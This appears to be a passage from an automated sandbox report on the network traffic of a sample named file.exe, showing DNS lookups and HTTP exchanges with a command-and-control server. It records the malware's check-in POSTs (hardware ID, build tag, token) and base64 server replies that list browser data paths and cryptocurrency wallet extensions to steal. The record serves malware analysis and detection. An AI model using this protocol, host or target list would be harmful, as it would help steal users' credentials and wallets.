Jul 26, 2024 17:58:27.969475985 CEST	192.168.2.5	1.1.1.1	0x4b51	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Jul 26, 2024 17:58:27.969682932 CEST	192.168.2.5	1.1.1.1	0x36e7	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 17:58:27.969784021 CEST	192.168.2.5	1.1.1.1	0xa98	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Jul 26, 2024 17:58:34.473501921 CEST	192.168.2.5	1.1.1.1	0xa3df	Standard query (0)	www.youtube-nocookie.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 18:00:50.180779934 CEST	192.168.2.5	1.1.1.1	0x4ab4	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 18:00:50.180887938 CEST	192.168.2.5	1.1.1.1	0x7c09	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Jul 26, 2024 18:01:55.172796965 CEST	192.168.2.5	1.1.1.1	0x5d1a	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 18:01:55.172796965 CEST	192.168.2.5	1.1.1.1	0xe155	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Jul 26, 2024 18:03:58.275607109 CEST	192.168.2.5	1.1.1.1	0x31bb	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 18:03:58.275691032 CEST	192.168.2.5	1.1.1.1	0x1bfd	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jul 26, 2024 17:57:15.049977064 CEST	1.1.1.1	192.168.2.5	0x8928	No error (0)	bingadsedgeextension-prod-centralus.azurewebsites.net	ssl.bingadsedgeextension-prod-centralus.azurewebsites.net		CNAME (Canonical name)	IN (0x0001)	false
Jul 26, 2024 17:57:15.049977064 CEST	1.1.1.1	192.168.2.5	0x8928	No error (0)	ssl.bingadsedgeextension-prod-centralus.azurewebsites.net		52.153.155.231	A (IP address)	IN (0x0001)	false
Jul 26, 2024 17:57:15.050822020 CEST	1.1.1.1	192.168.2.5	0x23d5	No error (0)	bingadsedgeextension-prod-centralus.azurewebsites.net	ssl.bingadsedgeextension-prod-centralus.azurewebsites.net		CNAME (Canonical name)	IN (0x0001)	false
Jul 26, 2024 17:57:15.839854956 CEST	1.1.1.1	192.168.2.5	0x52ef	No error (0)	bzib.nelreports.net	bzib.nelreports.net.akamaized.net		CNAME (Canonical name)	IN (0x0001)	false
Jul 26, 2024 17:57:15.841129065 CEST	1.1.1.1	192.168.2.5	0x8ee	No error (0)	bzib.nelreports.net	bzib.nelreports.net.akamaized.net		CNAME (Canonical name)	IN (0x0001)	false
Jul 26, 2024 17:57:19.508888960 CEST	1.1.1.1	192.168.2.5	0x6660	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Jul 26, 2024 17:57:19.508888960 CEST	1.1.1.1	192.168.2.5	0x6660	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Jul 26, 2024 17:57:19.509291887 CEST	1.1.1.1	192.168.2.5	0x3919	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Jul 26, 2024 17:57:19.510005951 CEST	1.1.1.1	192.168.2.5	0xe960	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Jul 26, 2024 17:57:19.510189056 CEST	1.1.1.1	192.168.2.5	0x2639	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Jul 26, 2024 17:57:19.510189056 CEST	1.1.1.1	192.168.2.5	0x2639	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Jul 26, 2024 17:57:19.621704102 CEST	1.1.1.1	192.168.2.5	0xee51	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Jul 26, 2024 17:57:19.621704102 CEST	1.1.1.1	192.168.2.5	0xee51	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Jul 26, 2024 17:57:19.622297049 CEST	1.1.1.1	192.168.2.5	0x864	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Jul 26, 2024 17:57:25.113158941 CEST	1.1.1.1	192.168.2.5	0x2d89	No error (0)	prod.classify-client.prod.webservices.mozgcp.net		35.190.72.216	A (IP address)	IN (0x0001)	false
Jul 26, 2024 17:57:25.155270100 CEST	1.1.1.1	192.168.2.5	0x8462	No error (0)	prod.classify-client.prod.webservices.mozgcp.net		35.190.72.216	A (IP address)	IN (0x0001)	false
Jul 26, 2024 17:57:28.354996920 CEST	1.1.1.1	192.168.2.5	0x85f6	Name error (3)	BOAbiVqkIfMQExjauBCLW.BOAbiVqkIfMQExjauBCLW	none	none	A (IP address)	IN (0x0001)	false
Jul 26, 2024 17:57:31.030747890 CEST	1.1.1.1	192.168.2.5	0xbc35	No error (0)	vaniloin.fun		104.21.72.79	A (IP address)	IN (0x0001)	false
Jul 26, 2024 17:57:31.030747890 CEST	1.1.1.1	192.168.2.5	0xbc35	No error (0)	vaniloin.fun		172.67.177.136	A (IP address)	IN (0x0001)	false
Jul 26, 2024 17:57:47.055686951 CEST	1.1.1.1	192.168.2.5	0xccd6	No error (0)	bzib.nelreports.net	bzib.nelreports.net.akamaized.net		CNAME (Canonical name)	IN (0x0001)	false
Jul 26, 2024 17:57:47.060491085 CEST	1.1.1.1	192.168.2.5	0xb1de	No error (0)	bzib.nelreports.net	bzib.nelreports.net.akamaized.net		CNAME (Canonical name)	IN (0x0001)	false
Jul 26, 2024 17:57:47.426060915 CEST	1.1.1.1	192.168.2.5	0xad11	No error (0)	clients2.googleusercontent.com	googlehosted.l.googleusercontent.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 26, 2024 17:57:47.426060915 CEST	1.1.1.1	192.168.2.5	0xad11	No error (0)	googlehosted.l.googleusercontent.com		142.250.185.161	A (IP address)	IN (0x0001)	false
Jul 26, 2024 17:57:47.429019928 CEST	1.1.1.1	192.168.2.5	0x1e0e	No error (0)	clients2.googleusercontent.com	googlehosted.l.googleusercontent.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 26, 2024 17:57:50.850441933 CEST	1.1.1.1	192.168.2.5	0x4e62	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Jul 26, 2024 17:57:50.850441933 CEST	1.1.1.1	192.168.2.5	0x4e62	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Jul 26, 2024 17:57:50.850461006 CEST	1.1.1.1	192.168.2.5	0x3566	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Jul 26, 2024 17:57:50.850466967 CEST	1.1.1.1	192.168.2.5	0xd3ee	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Jul 26, 2024 17:57:50.850466967 CEST	1.1.1.1	192.168.2.5	0xd3ee	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Jul 26, 2024 17:57:50.850472927 CEST	1.1.1.1	192.168.2.5	0x1a91	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Jul 26, 2024 17:58:27.976602077 CEST	1.1.1.1	192.168.2.5	0xe6d6	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Jul 26, 2024 17:58:27.976602077 CEST	1.1.1.1	192.168.2.5	0xe6d6	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Jul 26, 2024 17:58:27.976624966 CEST	1.1.1.1	192.168.2.5	0x36e7	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Jul 26, 2024 17:58:27.976624966 CEST	1.1.1.1	192.168.2.5	0x36e7	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Jul 26, 2024 17:58:27.977047920 CEST	1.1.1.1	192.168.2.5	0x4b51	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Jul 26, 2024 17:58:27.977066040 CEST	1.1.1.1	192.168.2.5	0xa98	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Jul 26, 2024 18:00:50.189153910 CEST	1.1.1.1	192.168.2.5	0x4ab4	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Jul 26, 2024 18:00:50.189153910 CEST	1.1.1.1	192.168.2.5	0x4ab4	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Jul 26, 2024 18:00:50.189167023 CEST	1.1.1.1	192.168.2.5	0x7c09	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Jul 26, 2024 18:01:55.185911894 CEST	1.1.1.1	192.168.2.5	0x5d1a	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Jul 26, 2024 18:01:55.185911894 CEST	1.1.1.1	192.168.2.5	0x5d1a	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Jul 26, 2024 18:01:55.185993910 CEST	1.1.1.1	192.168.2.5	0xe155	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Jul 26, 2024 18:03:58.283626080 CEST	1.1.1.1	192.168.2.5	0x31bb	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Jul 26, 2024 18:03:58.283626080 CEST	1.1.1.1	192.168.2.5	0x31bb	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Jul 26, 2024 18:03:58.283641100 CEST	1.1.1.1	192.168.2.5	0x1bfd	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	85.28.47.31	80	616	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:56:02.869400978 CEST	86	OUT	GET / HTTP/1.1 Host: 85.28.47.31 Connection: Keep-Alive Cache-Control: no-cache
Jul 26, 2024 17:56:03.505361080 CEST	203	IN	HTTP/1.1 200 OK Date: Fri, 26 Jul 2024 15:56:03 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Jul 26, 2024 17:56:03.509869099 CEST	409	OUT	POST /5499d72b3a3e55be.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GIECFIEGDBKJKFIDHIEC Host: 85.28.47.31 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 49 45 43 46 49 45 47 44 42 4b 4a 4b 46 49 44 48 49 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 31 42 42 30 41 46 41 33 31 36 44 33 33 39 32 32 35 39 37 34 39 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 43 46 49 45 47 44 42 4b 4a 4b 46 49 44 48 49 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 69 6c 61 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 43 46 49 45 47 44 42 4b 4a 4b 46 49 44 48 49 45 43 2d 2d 0d 0a Data Ascii: ------GIECFIEGDBKJKFIDHIECContent-Disposition: form-data; name="hwid"A1BB0AFA316D3392259749------GIECFIEGDBKJKFIDHIECContent-Disposition: form-data; name="build"sila------GIECFIEGDBKJKFIDHIEC--
Jul 26, 2024 17:56:03.813307047 CEST	407	IN	HTTP/1.1 200 OK Date: Fri, 26 Jul 2024 15:56:03 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 180 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 4a 6d 4d 6d 59 32 4e 57 51 79 4f 54 41 35 4e 32 4e 6d 4d 32 4d 78 4e 6a 63 32 59 7a 55 35 4d 6a 4a 69 4d 44 4d 79 5a 57 45 34 4f 54 42 68 5a 6a 64 6c 4d 6d 51 31 4e 6a 67 77 4d 44 4a 6d 4e 7a 4a 6b 4d 57 55 7a 4d 57 51 34 4d 32 55 78 4e 54 64 6b 4d 54 6c 6a 59 32 56 6d 4d 54 4d 77 66 48 64 72 61 32 70 78 59 57 6c 68 65 47 74 6f 59 6e 78 7a 62 57 70 73 62 47 31 35 62 57 78 69 65 6e 45 75 63 48 64 6b 66 44 42 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 78 66 48 6c 69 62 6d 4e 69 61 48 6c 73 5a 58 42 74 5a 58 77 3d Data Ascii: YmJmMmY2NWQyOTA5N2NmM2MxNjc2YzU5MjJiMDMyZWE4OTBhZjdlMmQ1NjgwMDJmNzJkMWUzMWQ4M2UxNTdkMTljY2VmMTMwfHdra2pxYWlheGtoYnxzbWpsbG15bWxienEucHdkfDB8MHwxfDF8MXwxfDF8MXwxfHlibmNiaHlsZXBtZXw=
Jul 26, 2024 17:56:03.815872908 CEST	466	OUT	POST /5499d72b3a3e55be.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DAFIEHIEGDHIDGDGHDHJ Host: 85.28.47.31 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 44 41 46 49 45 48 49 45 47 44 48 49 44 47 44 47 48 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 62 66 32 66 36 35 64 32 39 30 39 37 63 66 33 63 31 36 37 36 63 35 39 32 32 62 30 33 32 65 61 38 39 30 61 66 37 65 32 64 35 36 38 30 30 32 66 37 32 64 31 65 33 31 64 38 33 65 31 35 37 64 31 39 63 63 65 66 31 33 30 0d 0a 2d 2d 2d 2d 2d 2d 44 41 46 49 45 48 49 45 47 44 48 49 44 47 44 47 48 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 44 41 46 49 45 48 49 45 47 44 48 49 44 47 44 47 48 44 48 4a 2d 2d 0d 0a Data Ascii: ------DAFIEHIEGDHIDGDGHDHJContent-Disposition: form-data; name="token"bbf2f65d29097cf3c1676c5922b032ea890af7e2d568002f72d1e31d83e157d19ccef130------DAFIEHIEGDHIDGDGHDHJContent-Disposition: form-data; name="message"browsers------DAFIEHIEGDHIDGDGHDHJ--
Jul 26, 2024 17:56:04.031388998 CEST	1236	IN	HTTP/1.1 200 OK Date: Fri, 26 Jul 2024 15:56:03 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 1520 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 53 42 44 59 57 35 68 63 6e 6c 38 58 45 64 76 62 32 64 73 5a 56 78 44 61 48 4a 76 62 57 55 67 55 33 68 54 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 44 61 48 4a 76 62 57 6c 31 62 58 78 63 51 32 68 79 62 32 31 70 64 57 31 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 56 47 39 79 59 32 68 38 58 46 52 76 63 6d 4e 6f 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 4d 48 78 57 61 58 5a 68 62 47 52 70 66 46 78 57 61 58 5a 68 62 47 52 70 58 46 [TRUNCATED] Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8R29vZ2xlIENocm9tZSBDYW5hcnl8XEdvb2dsZVxDaHJvbWUgU3hTXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXxDaHJvbWl1bXxcQ2hyb21pdW1cVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8VG9yY2h8XFRvcmNoXFVzZXIgRGF0YXxjaHJvbWV8MHxWaXZhbGRpfFxWaXZhbGRpXFVzZXIgRGF0YXxjaHJvbWV8dml2YWxkaS5leGV8Q29tb2RvIERyYWdvbnxcQ29tb2RvXERyYWdvblxVc2VyIERhdGF8Y2hyb21lfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8Q29jQ29jfFxDb2NDb2NcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDZW50IEJyb3dzZXJ8XENlbnRCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8MHw3U3RhcnxcN1N0YXJcN1N0YXJcVXNlciBEYXRhfGNocm9tZXwwfENoZWRvdCBCcm93c2VyfFxDaGVkb3RcVXNlciBEYXRhfGNocm9tZXwwfE1pY3Jvc29mdCBFZGdlfFxNaWNyb3NvZnRcRWRnZVxVc2VyIERhdGF8Y2hyb21lfG1zZWRnZS5leGV8MzYwIEJyb3dzZXJ8XDM2MEJyb3dzZXJcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8UVFCcm93c2VyfFxUZW5jZW50XFFRQnJvd3Nl
Jul 26, 2024 17:56:04.032689095 CEST	512	IN	Data Raw: 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 51 33 4a 35 63 48 52 76 56 47 46 69 66 46 78 44 63 6e 6c 77 64 47 39 55 59 57 49 67 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 Data Ascii: clxVc2VyIERhdGF8Y2hyb21lfDB8Q3J5cHRvVGFifFxDcnlwdG9UYWIgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyb3dzZXIuZXhlfE9wZXJhIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE9wZXJhIEdYIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE1vemlsbGEgRml
Jul 26, 2024 17:56:04.040330887 CEST	465	OUT	POST /5499d72b3a3e55be.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JKEHIIJJECFHJKECFHDG Host: 85.28.47.31 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4a 4b 45 48 49 49 4a 4a 45 43 46 48 4a 4b 45 43 46 48 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 62 66 32 66 36 35 64 32 39 30 39 37 63 66 33 63 31 36 37 36 63 35 39 32 32 62 30 33 32 65 61 38 39 30 61 66 37 65 32 64 35 36 38 30 30 32 66 37 32 64 31 65 33 31 64 38 33 65 31 35 37 64 31 39 63 63 65 66 31 33 30 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 48 49 49 4a 4a 45 43 46 48 4a 4b 45 43 46 48 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 48 49 49 4a 4a 45 43 46 48 4a 4b 45 43 46 48 44 47 2d 2d 0d 0a Data Ascii: ------JKEHIIJJECFHJKECFHDGContent-Disposition: form-data; name="token"bbf2f65d29097cf3c1676c5922b032ea890af7e2d568002f72d1e31d83e157d19ccef130------JKEHIIJJECFHJKECFHDGContent-Disposition: form-data; name="message"plugins------JKEHIIJJECFHJKECFHDG--
Jul 26, 2024 17:56:04.257733107 CEST	1236	IN	HTTP/1.1 200 OK Date: Fri, 26 Jul 2024 15:56:04 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 7116 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED] Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5
Jul 26, 2024 17:56:04.257872105 CEST	1236	IN	Data Raw: 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46 Data Ascii: IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhbGxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29
Jul 26, 2024 17:56:04.257885933 CEST	1236	IN	Data Raw: 66 47 52 75 5a 32 31 73 59 6d 78 6a 62 32 52 6d 62 32 4a 77 5a 48 42 6c 59 32 46 68 5a 47 64 6d 59 6d 4e 6e 5a 32 5a 71 5a 6d 35 74 66 44 46 38 4d 48 77 77 66 45 74 6c 5a 58 42 6c 63 69 42 58 59 57 78 73 5a 58 52 38 62 48 42 70 62 47 4a 75 61 57 Data Ascii: fGRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfDF8MHwwfEtlZXBlciBXYWxsZXR8bHBpbGJuaWlhYmFja2RqY2lvbmtvYmdsbWRkZmJjam98MXwwfDB8U29sZmxhcmUgV2FsbGV0fGJoaGhsYmVwZGtiYXBhZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWd
Jul 26, 2024 17:56:04.284957886 CEST	1236	IN	Data Raw: 49 45 46 77 64 47 39 7a 49 46 64 68 62 47 78 6c 64 48 78 77 61 47 74 69 59 57 31 6c 5a 6d 6c 75 5a 32 64 74 59 57 74 6e 61 32 78 77 61 32 78 71 61 6d 31 6e 61 57 4a 76 61 47 35 69 59 58 77 78 66 44 42 38 4d 48 78 51 5a 58 52 79 59 53 42 42 63 48 Data Ascii: IEFwdG9zIFdhbGxldHxwaGtiYW1lZmluZ2dtYWtna2xwa2xqam1naWJvaG5iYXwxfDB8MHxQZXRyYSBBcHRvcyBXYWxsZXR8ZWpqbGFkaW5uY2tkZ2plbWVrZWJkcGVva2Jpa2hmY2l8MXwwfDB8TWFydGlhbiBBcHRvcyBXYWxsZXR8ZWZiZ2xnb2ZvaXBwYmdjamVwbmhpYmxhaWJjbmNsZ2t8MXwwfDB8RmlubmllfGNqbWt
Jul 26, 2024 17:56:04.284971952 CEST	1236	IN	Data Raw: 59 57 5a 6a 61 48 77 78 66 44 42 38 4d 48 78 4e 57 55 74 4a 66 47 4a 74 61 57 74 77 5a 32 39 6b 63 47 74 6a 62 47 35 72 5a 32 31 75 63 48 42 6f 5a 57 68 6b 5a 32 4e 70 62 57 31 70 5a 47 56 6b 66 44 46 38 4d 48 77 77 66 46 4e 77 62 47 6c 72 61 58 Data Ascii: YWZjaHwxfDB8MHxNWUtJfGJtaWtwZ29kcGtjbG5rZ21ucHBoZWhkZ2NpbW1pZGVkfDF8MHwwfFNwbGlraXR5fGpoZmpmY2xlcGFjb2xkbWpta21kbG1nYW5mYWFsa2xifDF8MHwwfENvbW1vbktleXxjaGdmZWZqcGNvYmZibnBtaW9rZmpqYWdsYWhtbmRlZHwxfDB8MHxab2hvIFZhdWx0fGlna3Bjb2RoaWVvbXBlbG9uY2Z
